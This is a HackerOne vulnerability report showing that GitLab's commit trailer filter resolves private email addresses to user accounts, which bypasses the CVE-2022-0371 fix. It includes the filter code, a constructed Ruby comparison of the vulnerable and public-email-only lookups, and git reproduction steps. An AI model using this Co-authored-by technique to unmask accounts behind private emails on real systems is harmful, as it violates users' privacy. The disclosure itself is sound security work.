Authenticated users can find other users by their private email
HackerOne report #1794713 by shells3c
on 2022-12-06, assigned to @rshambhuni:
Report
Summary
Since GitLab 14.7.1, 14.6.4, and 14.5.4, you can no longer find users by their non-public email; this is the fix for CVE-2022-0371 and is also documented in the official documentation. However, I found that I could still do it just by using a commit trailer. This happens because lib/banzai/filter/commit_trailers_filter.rb uses User.find_by_any_email to find a user handle from an email address, and User.find_by_any_email doesn't respect the email policy at all:
def trailer_filter(text)
  text.lines.map! do |line|
    trailer, rest = line.split(':', 2)

    next line unless trailer.downcase.end_with?('-by') && rest.present?

    chunks = rest.split
    author_email = chunks.pop.delete_prefix('<').delete_suffix('>')

    next line unless Devise.email_regexp.match(author_email)

    author_name = chunks.join(' ').strip

    trailer = "#{trailer.strip}:"

    "#{trailer} #{link_to_user_or_email(author_name, author_email, trailer)}\n"
  end.join
end

def link_to_user_or_email(name, email, trailer)
  link_to_user User.find_by_any_email(email),
    name: name,
    email: email,
    trailer: trailer
end
So a commit like the one below:
commit cd330155a136985ada2c350c854a835afed1fb11 (HEAD -> h1test, origin/h1test)
Author: me <me@myemail.com>
Date: Tue Dec 6 14:36:00 2022 +0700
Commit message
Co-authored-by: foo <privateemail@gmail.com>
will be converted to:
<a href="https://gitlab.com/USERNAME" title="privateemail@gmail.com">
<img alt="FULL_NAME's avatar" src="..." class="avatar s16 avatar-inline" title="FULL_NAME">
</a>
<a href="https://gitlab.com/USERNAME" title="privateemail@gmail.com">foo</a>
<<a href="mailto:privateemail@gmail.com" title="privateemail@gmail.com">privateemail@gmail.com</a> >
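The difference between the two lookups, as an added example that is not GitLab's code: a small model of the trailer filter run with an any-email lookup (the reported behaviour) and with a lookup that resolves only an email the user chose to publish. The User struct, the sample accounts and EMAIL_RE are constructed stand-ins.

```ruby
# Simplified model of the lookup the report describes. Not GitLab's code:
# the User struct, USERS table, EMAIL_RE and both lookup functions are
# stand-ins constructed for this example.
EMAIL_RE = /\A[^@\s]+@[^@\s]+\z/ # stand-in for Devise.email_regexp

User = Struct.new(:username, :public_email, :all_emails)

# Constructed sample accounts: alice publishes an email, bob keeps his private.
USERS = [
  User.new('alice', 'alice@example.com', ['alice@example.com']),
  User.new('bob', nil, ['bob-private@example.com'])
].freeze

# Vulnerable lookup: any address on the account resolves it, public or not.
def find_by_any_email(email)
  USERS.find { |u| u.all_emails.include?(email) }
end

# Privacy-respecting lookup: only an address the user chose to publish resolves.
def find_by_public_email(email)
  USERS.find { |u| u.public_email == email }
end

# Same shape as the report's link_to_user_or_email: profile link when a user
# is found, otherwise a plain mailto link that reveals no account.
def render_trailer_target(name, email, lookup)
  user = lookup.call(email)
  return "<a href=\"mailto:#{email}\">#{name}</a>" unless user
  "<a href=\"/#{user.username}\">#{name}</a>"
end

# Rewrites "*-by:" trailers the way the filter does, using the given lookup.
def trailer_filter(text, lookup)
  text.lines.map do |line|
    trailer, rest = line.split(':', 2)
    next line unless trailer.downcase.end_with?('-by') && rest && !rest.strip.empty?
    chunks = rest.split
    email = chunks.pop.delete_prefix('<').delete_suffix('>')
    next line unless EMAIL_RE.match?(email)
    "#{trailer.strip}: #{render_trailer_target(chunks.join(' ').strip, email, lookup)}\n"
  end.join
end
```

With the any-email lookup the private address in a Co-authored-by trailer turns into a link to bob's profile; with the public-email lookup the same trailer degrades to a mailto link and the account stays unlinked.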
Steps to reproduce
I will use my own email address in this test: hacker0x02@gmail.com
- Confirm that the email isn't public and can't be searched via the API by visiting
https://gitlab.com/api/v4/users?search=hacker0x02@gmail.com
Response:
[]
- Create a repository, clone it and do the following:
$ echo test > a.txt
$ git add -A
$ git commit -m '.
>
> Co-authored-by: a <hacker0x02@gmail.com>'
$ git checkout -b h1test
$ git push origin h1test
...
- Visit the repository, view Commits and you will find the commit
- Expand the commit and click on the avatar; you will be redirected to my GitLab account
Output of checks
This bug happens on GitLab.com
Impact
Similar to CVE-2022-0371, users can look up accounts with private email addresses